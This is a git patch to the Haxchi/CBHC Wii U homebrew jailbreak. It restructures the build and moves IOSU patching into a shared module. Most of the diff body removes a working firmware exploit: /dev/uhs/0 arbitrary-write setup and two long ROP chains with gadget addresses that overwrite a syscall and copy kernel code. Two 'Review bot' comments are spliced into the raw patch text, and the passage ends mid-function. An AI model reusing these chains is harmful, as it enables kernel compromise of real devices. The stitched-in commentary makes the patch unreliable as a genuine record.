From 0ad99123db6ffd119f38badaab3ab97ea3c40999 Mon Sep 17 00:00:00 2001 
From: FIX94 Date: Mon, 19 Dec 2016 04:14:47 +0100 Subject: [PATCH] -use same iosu patcher for both haxchi and cbhc to allow haxchi to benefit from it -added new config option to haxchi, "sysmenu" which will relaunch you into the system menu with signature, region patches and everything else that cbhc patches -small logic correction in the iosu patcher --- dsrom/CBHC/README | 2 - dsrom/Makefile | 12 +- dsrom/cbhc_menu/Makefile | 32 ++ dsrom/{CBHC => cbhc_menu}/coreinit.h | 0 dsrom/{CBHC => cbhc_menu}/crt0.S | 0 dsrom/{CBHC => cbhc_menu}/main.c | 378 +---------------- dsrom/{CBHC => cbhc_menu}/pad.h | 0 dsrom/{CBHC => cbhc_menu}/types.h | 0 dsrom/cfw_booter/Makefile | 44 -- dsrom/cfw_booter/README | 2 - dsrom/cfw_booter/arm_kernel/Makefile | 71 ---- dsrom/cfw_booter/arm_kernel/link.ld | 18 - dsrom/cfw_booter/arm_kernel/source/crt0.s | 12 - dsrom/cfw_booter/arm_kernel/source/main.c | 122 ------ dsrom/cfw_booter/arm_kernel/source/types.h | 16 - dsrom/cfw_booter/arm_kernel/source/utils.c | 25 -- dsrom/cfw_booter/arm_kernel/source/utils.h | 7 - dsrom/cfw_booter/arm_user/Makefile | 71 ---- dsrom/cfw_booter/arm_user/link.ld | 18 - dsrom/cfw_booter/arm_user/source/crt0.s | 20 - dsrom/cfw_booter/arm_user/source/main.c | 30 -- dsrom/cfw_booter/arm_user/source/types.h | 16 - dsrom/cfw_booter/arm_user/source/utils.c | 25 -- dsrom/cfw_booter/arm_user/source/utils.h | 7 - dsrom/cfw_booter/crt0.S | 7 - dsrom/cfw_booter/main.c | 387 ----------------- dsrom/global.h | 10 + dsrom/haxchi_rop.s | 24 +- dsrom/haxchi_rop_cb.s | 22 +- dsrom/{CBHC => iosu_patcher}/Makefile | 8 +- .../arm_kernel/Makefile | 0 .../{CBHC => iosu_patcher}/arm_kernel/link.ld | 0 .../arm_kernel/source/crt0.s | 0 .../arm_kernel/source/elf_abi.h | 0 .../arm_kernel/source/elf_patcher.c | 0 .../arm_kernel/source/elf_patcher.h | 0 .../arm_kernel/source/getbins.c | 3 + .../arm_kernel/source/getbins.h | 0 .../arm_kernel/source/main.c | 43 +- .../arm_kernel/source/mmu.s | 0 .../arm_kernel/source/reload.c | 14 +- 
.../arm_kernel/source/reload.h | 0 .../arm_kernel/source/types.h | 0 .../arm_kernel/source/utils.c | 0 .../arm_kernel/source/utils.h | 0 .../{CBHC => iosu_patcher}/arm_user/Makefile | 0 dsrom/{CBHC => iosu_patcher}/arm_user/link.ld | 0 .../arm_user/source/crt0.s | 0 .../arm_user/source/main.c | 0 .../arm_user/source/types.h | 0 .../arm_user/source/utils.c | 0 .../arm_user/source/utils.h | 0 dsrom/{cfw_booter => iosu_patcher}/coreinit.h | 0 dsrom/iosu_patcher/crt0.S | 6 + dsrom/iosu_patcher/main.c | 388 ++++++++++++++++++ .../{CBHC => iosu_patcher}/titleprot/Makefile | 0 .../{CBHC => iosu_patcher}/titleprot/ccd00.ld | 0 .../titleprot/ccd00.specs | 0 .../titleprot/source/crt0.s | 0 dsrom/{cfw_booter => iosu_patcher}/types.h | 2 - dsrom/option_select/Makefile | 8 +- dsrom/option_select/main.c | 42 +- installer/src/main.c | 4 +- release/haxchi/config.txt | 1 + release/wiiu/apps/cbhc/meta.xml | 4 +- release/wiiu/apps/haxchi/meta.xml | 4 +- 66 files changed, 571 insertions(+), 1334 deletions(-) delete mode 100644 dsrom/CBHC/README create mode 100644 dsrom/cbhc_menu/Makefile rename dsrom/{CBHC => cbhc_menu}/coreinit.h (100%) rename dsrom/{CBHC => cbhc_menu}/crt0.S (100%) rename dsrom/{CBHC => cbhc_menu}/main.c (51%) rename dsrom/{CBHC => cbhc_menu}/pad.h (100%) rename dsrom/{CBHC => cbhc_menu}/types.h (100%) delete mode 100644 dsrom/cfw_booter/Makefile delete mode 100644 dsrom/cfw_booter/README delete mode 100644 dsrom/cfw_booter/arm_kernel/Makefile delete mode 100644 dsrom/cfw_booter/arm_kernel/link.ld delete mode 100644 dsrom/cfw_booter/arm_kernel/source/crt0.s delete mode 100644 dsrom/cfw_booter/arm_kernel/source/main.c delete mode 100644 dsrom/cfw_booter/arm_kernel/source/types.h delete mode 100644 dsrom/cfw_booter/arm_kernel/source/utils.c delete mode 100644 dsrom/cfw_booter/arm_kernel/source/utils.h delete mode 100644 dsrom/cfw_booter/arm_user/Makefile delete mode 100644 dsrom/cfw_booter/arm_user/link.ld delete mode 100644 dsrom/cfw_booter/arm_user/source/crt0.s 
delete mode 100644 dsrom/cfw_booter/arm_user/source/main.c delete mode 100644 dsrom/cfw_booter/arm_user/source/types.h delete mode 100644 dsrom/cfw_booter/arm_user/source/utils.c delete mode 100644 dsrom/cfw_booter/arm_user/source/utils.h delete mode 100644 dsrom/cfw_booter/crt0.S delete mode 100644 dsrom/cfw_booter/main.c create mode 100644 dsrom/global.h rename dsrom/{CBHC => iosu_patcher}/Makefile (87%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/Makefile (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/link.ld (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/crt0.s (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/elf_abi.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/elf_patcher.c (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/elf_patcher.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/getbins.c (84%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/getbins.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/main.c (86%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/mmu.s (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/reload.c (90%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/reload.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/types.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/utils.c (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/utils.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/Makefile (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/link.ld (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/crt0.s (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/main.c (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/types.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/utils.c (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/utils.h (100%) rename dsrom/{cfw_booter => iosu_patcher}/coreinit.h (100%) create mode 100644 
dsrom/iosu_patcher/crt0.S create mode 100644 dsrom/iosu_patcher/main.c rename dsrom/{CBHC => iosu_patcher}/titleprot/Makefile (100%) rename dsrom/{CBHC => iosu_patcher}/titleprot/ccd00.ld (100%) rename dsrom/{CBHC => iosu_patcher}/titleprot/ccd00.specs (100%) rename dsrom/{CBHC => iosu_patcher}/titleprot/source/crt0.s (100%) rename dsrom/{cfw_booter => iosu_patcher}/types.h (94%) diff --git a/dsrom/CBHC/README b/dsrom/CBHC/README deleted file mode 100644 index 2dbcc78..0000000 --- a/dsrom/CBHC/README +++ /dev/null @@ -1,2 +0,0 @@ -This is a modified version of cfw booter which can be found here: -https://github.com/dimok789/cfw_booter \ No newline at end of file diff --git a/dsrom/Makefile b/dsrom/Makefile index f02f69c..8001715 100644 --- a/dsrom/Makefile +++ b/dsrom/Makefile @@ -54,10 +54,10 @@ zeldaph: setup_zeldaph zeldaph.nds zeldast: setup_zeldast zeldast.nds setup: - @cd option_select && make && cd .. + @cd cbhc_menu && make && cd .. @cd hbl_loader && make && cd .. - @cd cfw_booter && make && cd .. - @cd CBHC && make && cd .. + @cd iosu_patcher && make && cd .. + @cd option_select && make && cd .. setup_animalcrossing: @rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin @@ -267,8 +267,8 @@ zeldast.zip: clean: @rm -f *.bin *.nds ../installer/data/*.zip defines.s - @cd option_select && make clean && cd .. + @cd cbhc_menu && make clean && cd .. @cd hbl_loader && make clean && cd .. - @cd cfw_booter && make clean && cd .. - @cd CBHC && make clean && cd .. + @cd iosu_patcher && make clean && cd .. + @cd option_select && make clean && cd .. @echo "all cleaned up !" diff --git a/dsrom/cbhc_menu/Makefile b/dsrom/cbhc_menu/Makefile new file mode 100644 index 0000000..16e4976 --- /dev/null +++ b/dsrom/cbhc_menu/Makefile 
@@ -0,0 +1,32 @@
+PATH := $(DEVKITPPC)/bin:$(PATH)
+PREFIX ?= powerpc-eabi-
+CC = $(PREFIX)gcc
+AS = $(PREFIX)gcc
+CFLAGS = -std=gnu89 -O3 -Wall -nostdinc -fno-builtin -I$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0/include -I$(DEVKITPPC)/powerpc-eabi/include
+ASFLAGS = -mregnames -x assembler-with-cpp
+LD = $(PREFIX)ld
+OBJCOPY = $(PREFIX)objcopy
+LDFLAGS=-Ttext 1808000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -L$(DEVKITPPC)/powerpc-eabi/lib -lgcc -lc
+OBJDUMP ?= $(PREFIX)objdump
+project := .
+root := $(CURDIR)
+build := $(root)/bin
+
+FIRMWARE = 550
+
+all: clean setup main
+
+setup:
+	mkdir -p $(root)/bin/
+
+main:
+	$(CC) $(CFLAGS) -DVER=$(FIRMWARE) -c $(project)/main.c
+	$(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S
+	cp -r $(root)/*.o $(build)
+	rm $(root)/*.o
+	$(LD) -o cbhc_menu.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map cbhc_menu.map
+	$(OBJCOPY) cbhc_menu.elf -S -O binary ../cbhc_menu.bin
+
+clean:
+	rm -rf $(build) payload
+	rm -rf cbhc_menu.elf cbhc_menu.map
diff --git a/dsrom/CBHC/coreinit.h b/dsrom/cbhc_menu/coreinit.h
similarity index 100%
rename from dsrom/CBHC/coreinit.h
rename to dsrom/cbhc_menu/coreinit.h
diff --git a/dsrom/CBHC/crt0.S b/dsrom/cbhc_menu/crt0.S
similarity index 100%
rename from dsrom/CBHC/crt0.S
rename to dsrom/cbhc_menu/crt0.S
diff --git a/dsrom/CBHC/main.c b/dsrom/cbhc_menu/main.c
similarity index 51%
rename from dsrom/CBHC/main.c
rename to dsrom/cbhc_menu/main.c
index 43d97ae..aa176ef 100644
--- a/dsrom/CBHC/main.c
+++ b/dsrom/cbhc_menu/main.c
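Review bot: The new `CFLAGS` and `LDFLAGS` lines hard-code the toolchain release directory `powerpc-eabi/6.2.0`, and because the build also passes `-nostdinc`, any other devkitPPC version will either fail to find headers or silently pick a mismatched `libgcc`; deriving the directory from the compiler avoids that, e.g. `GCCVER := $(shell $(CC) -dumpversion)` and then `-I$(DEVKITPPC)/lib/gcc/powerpc-eabi/$(GCCVER)/include` / `-L$(DEVKITPPC)/lib/gcc/powerpc-eabi/$(GCCVER)`. The link address `-Ttext 1808000` is only 0x4000 bytes above the `0x01804000` entry the menu calls into for the IOSU patcher (see the `patch_iosu` call in cbhc_menu/main.c), and nothing in this Makefile checks the two binaries do not overlap; a comment such as `# must stay above iosu_patcher (entry 0x01804000, max 0x4000 bytes)` next to `LDFLAGS` would at least record the constraint, and a size check on `../cbhc_menu.bin` / the patcher binary could enforce it. Whether 0x4000 is really the patcher's budget is inferred from the two addresses alone and should be confirmed against the loader.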
@@ -8,21 +8,8 @@ #include "types.h" #include "coreinit.h" #include "pad.h" +#include "../global.h" -#define CHAIN_START 0x1016AD40 -#define SHUTDOWN 0x1012EE4C -#define SIMPLE_RETURN 0x101014E4 -#define SOURCE 0x01E20000 -#define IOS_CREATETHREAD 0x1012EABC -#define ARM_CODE_BASE 0x08135000 -#define REPLACE_SYSCALL 0x081298BC - -/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */ -#include "payload/arm_kernel_bin.h" -#include "payload/arm_user_bin.h" - -static void uhs_exploit_init(unsigned int coreinit_handle); -static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val); static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vpad_handle); #define BUS_SPEED 248625000 @@ -38,7 +25,7 @@ static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vp #define SD_HBL_PATH "/vol/external01/wiiu/apps/homebrew_launcher/homebrew_launcher.elf" #define SD_MOCHA_PATH "/vol/external01/wiiu/apps/mocha/mocha.elf" -static const char *verChar = "CBHC v1.4 by FIX94"; +static const char *verChar = "CBHC v1.4u1 by FIX94"; #define DEFAULT_DISABLED 0 #define DEFAULT_SYSMENU 1 @@ -63,11 +50,6 @@ static const char *bootOpts[DEFAULT_MAX] = { "fw.img on SD Card", }; -#define LAUNCH_SYSMENU 0 -#define LAUNCH_HBL 1 -#define LAUNCH_MOCHA 2 -#define LAUNCH_CFW_IMG 3 - #define OSScreenEnable(enable) OSScreenEnableEx(0, enable); OSScreenEnableEx(1, enable); #define OSScreenClearBuffer(tmp) OSScreenClearBufferEx(0, tmp); OSScreenClearBufferEx(1, tmp); #define OSScreenPutFont(x, y, buf) OSScreenPutFontEx(0, x, y, buf); OSScreenPutFontEx(1, x, y, buf); 
@@ -413,11 +395,6 @@ doIOSUexploit: OSScreenClearBuffer(0); OSScreenFlipBuffers(); - memcpy((void*)0xF5E70100, &sysmenu, 8); - *(volatile unsigned int*)0xF5E70108 = dsvcid; - *(volatile unsigned int*)0xF5E7010C = launchmode; - DCStoreRange((void*)0xF5E70100, 0x20); - int (*OSForceFullRelaunch)(void); OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch); @@ -427,22 +404,16 @@ doIOSUexploit: void(*_SYSLaunchMenuWithCheckingAccount)(unsigned char slot); OSDynLoad_FindExport(sysapp_handle,0,"_SYSLaunchMenuWithCheckingAccount",&_SYSLaunchMenuWithCheckingAccount); - int (*IOS_Open)(char *path, unsigned int mode); - int (*IOS_Close)(int fd); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close); + //store path to sd fw.img for arm_kernel + if(launchmode == LAUNCH_CFW_IMG) + { + strcpy((void*)0xF5E70000,"/vol/sdcard"); + DCStoreRange((void*)0xF5E70000,0x100); + } - int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! Open /dev/uhs/0 IOS node - uhs_exploit_init(coreinit_handle); //! Init variables for the exploit - - //!------ROP CHAIN------- - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20); - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C); - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE); - - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC} - - IOS_Close(dev_uhs_0_handle); + //do iosu patches + void (*patch_iosu)(unsigned int coreinit_handle, unsigned int sysapp_handle, int launchmode, int from_cbhc) = (void*)0x01804000; + patch_iosu(coreinit_handle, sysapp_handle, launchmode, 1); if(launchmode == LAUNCH_HBL) { @@ -454,6 +425,7 @@ doIOSUexploit: strcpy((void*)0xF5E70000,SD_MOCHA_PATH); return 0x01800000; } + //sysmenu or cfw if(launchmode == LAUNCH_CFW_IMG) { 
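Review bot: The new `patch_iosu` call jumps to the bare constant `0x01804000` and is typed `void`, so if the patcher is not loaded there or its exploit fails the menu still falls through to `OSForceFullRelaunch` / `_SYSLaunchMenuWithCheckingAccount` as though the signature and region patches were in place. If the entry point in iosu_patcher/main.c can report a status (I cannot see that file here), declare it as `int (*patch_iosu)(unsigned int, unsigned int, int, int) = (void*)IOSU_PATCHER_ENTRY;` and gate the launch on `if(patch_iosu(coreinit_handle, sysapp_handle, launchmode, 1) < 0) { /* show error, do not relaunch */ }`; `IOSU_PATCHER_ENTRY` belongs in the already-included `global.h` rather than as a magic number at the call site. The `sysmenu` / `dsvcid` / `launchmode` staging at `0xF5E70100` removed above presumably moved into the patcher, and a one-line comment at the call (`/* patcher reads launchmode and writes the 0xF5E701xx block itself */`) would tell the next reader where that contract went. The enclosing function continues beyond this hunk, so I cannot see whether a later check covers the failure case.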
@@ -599,329 +571,3 @@ static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vp return btnDown; } - -/* ROP CHAIN STARTS HERE (0x1015BD78) */ -static const int final_chain[] = { - 0x101236f3, // 0x00 POP {R1-R7,PC} - 0x0, // 0x04 arg - 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR - 0x68, // 0x0C stacksize - 0x10101638, // 0x10 - 0x0, // 0x14 - 0x0, // 0x18 - 0x0, // 0x1C - 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x30 - 0x0, // 0x34 - IOS_CREATETHREAD, // 0x38 - 0x1, // 0x3C - 0x2, // 0x40 - 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE92D4010, // 0x4C value: PUSH {R4,LR} - 0x0, // 0x50 - 0x10123a8b, // 0x54 POP {R3,R4,PC} - 0x1, // 0x58 R3 must be 1 for the arbitrary write - 0x0, // 0x5C - 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x64 - 0x0, // 0x68 - 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) - 0x0, // 0x70 - 0x0, // 0x74 - 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A04000, // 0x80 value: MOV R4, R0 - 0x0, // 0x84 - 0x10123a8b, // 0x88 POP {R3,R4,PC} - 0x1, // 0x8C R3 must be 1 for the arbitrary write - 0x0, // 0x90 - 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x98 - 0x0, // 0x9C - 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) - 0x0, // 0xA4 - 0x0, // 0xA8 - 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF - 0x0, // 0xB8 - 0x10123a8b, // 0xBC POP {R3,R4,PC} - 0x1, // 0xC0 R3 must be 1 for the arbitrary write - 0x0, // 0xC4 - 0x1010CD18, // 0xC8 MOV R12, R0; MOV 
R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0xCC - 0x0, // 0xD0 - 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) - 0x0, // 0xD8 - 0x0, // 0xDC - 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) - 0x0, // 0xEC - 0x10123a8b, // 0xF0 POP {R3,R4,PC} - 0x1, // 0xF4 R3 must be 1 for the arbitrary write - 0x0, // 0xF8 - 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x100 - 0x0, // 0x104 - 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) - 0x0, // 0x10C - 0x0, // 0x110 - 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A00004, // 0x11C value: MOV R0, R4 - 0x0, // 0x120 - 0x10123a8b, // 0x124 POP {R3,R4,PC} - 0x1, // 0x128 R3 must be 1 for the arbitrary write - 0x0, // 0x12C - 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x134 - 0x0, // 0x138 - 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) - 0x0, // 0x140 - 0x0, // 0x144 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x00000000, // 0x150 value: NOP - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x1AFFFFFD, // 0x150 value: BNE clean_loop - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A03004, // 0x184 value: MOV R3, R4 - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 
0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE8BD4010, // 0x184 value: POP {R4,LR} - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) - 0x0, // 0x1BC - 0x10123a8b, // 0x1C0 POP {R3,R4,PC} - 0x1, // 0x1C4 R3 must be 1 for the arbitrary write - 0x0, // 0x1C8 - 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x1D0 - 0x0, // 0x1D4 - 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 - 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches - 0x0, // 0x1E0 - 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - ARM_CODE_BASE, // 0x1E8 our code destination address - 0x0, // 0x1EC - 0x0, // 0x1F0 - 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} - 0x0, // 0x1F8 - sizeof(arm_kernel_bin), // 0x1FC our code size - 0x0, // 0x200 - 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} - 0x01E40000, // 0x208 our code source location - 0x08131D04, // 0x20C KERNEL_MEMCPY address - 0x0, // 0x210 - 0x0, // 0x214 - 0x1012EBB4, // 0x218 
IOS_GetUpTime64 (privileged stack pivot) - 0x0, - 0x0, - 0x101312D0, -}; - -static const int second_chain[] = { - 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} - CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination - 0x0, // 0x08 - 0x0, // 0x0C - 0x101063db, // 0x10 POP {R1,R2,R5,PC} - 0x01E30000, // 0x14 source - sizeof(final_chain), // 0x18 length - 0x0, // 0x1C - 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x101236f3, // 0x2C POP {R1-R7,PC} - 0x0, // 0x30 arg - 0x101001DC, // 0x34 stackptr - 0x68, // 0x38 stacksize - 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x40 - 0x0, // 0x44 - 0x0, // 0x48 - 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x50 - 0x0, // 0x54 - 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x5C - 0x0, // 0x60 - IOS_CREATETHREAD, // 0x64 - 0x1, // 0x68 priority - 0x2, // 0x6C flags - 0x0, // 0x70 - 0x0, // 0x74 - 0x101063db, // 0x78 POP {R1,R2,R5,PC} - 0x0, // 0x7C - -(0x240 + 0x18 + 0xF000), // 0x80 stack offset - 0x0, // 0x84 - 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} - 0x0, - 0x0, - 0x0, - 0x00110000 - 0x44, // 0x8C - 0x00110010, // 0x90 - 0x0, // 0x94 - 0x0, // 0x98 - 0x0, // 0x9C - 0x0, // 0xA0 - 0x0, // 0xA4 - 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack - 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} - 0x0, - 0x0, - 0x1012EA68, // 0xAC stack pivot -}; - -static void uhs_exploit_init(unsigned int coreinit_handle) -{ - void (*DCStoreRange)(const void *addr, uint32_t length); - OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); - - //! 
